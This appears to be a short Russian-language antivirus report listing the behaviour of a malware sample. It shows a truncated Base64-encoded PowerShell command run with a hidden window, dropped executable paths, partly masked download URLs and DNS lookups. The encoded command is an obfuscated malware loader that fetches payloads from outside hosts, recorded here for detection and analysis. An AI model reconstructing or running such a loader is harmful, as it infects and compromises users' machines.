Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABNAHEAdgBiADUAZQByAD0AKAAoACcATwAnACsAJwBxAHIAZABfACcAKQArACcAMQAnACsAJwB2ACcAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAEUAbgBWADoAdQBTAEUAUgBwAHIAbwBmAGkATABFAFwARg...
- %HOMEPATH%\fy6ir_w\bd8j_41\e0c6vgg.exe
- %HOMEPATH%\fy6ir_w\bd8j_41\e0c6vgg.exe
- %HOMEPATH%\fy6ir_w\bd8j_41\e0c6vgg.exe
- http://da###lin.com/3qx/Z/
- http://ho###tay.design/wordpress/M/
- DNS ASK bo##86.com
- DNS ASK da###lin.com
- DNS ASK fe##mi.com
- DNS ASK xn###ullhd.com
- DNS ASK bu#######management-degree.net
- DNS ASK ho###tay.design
- DNS ASK cs####munity.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABNAHEAdgBiADUAZQByAD0AKAAoACcATwAnACsAJwBxAHIAZABfACcAKQArACcAMQAnACsAJwB2ACcAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAEUAbgBWADoAdQBTAEUAUgBwAHIAbwBmAGkATABFAFwARg...' (со скрытым окном)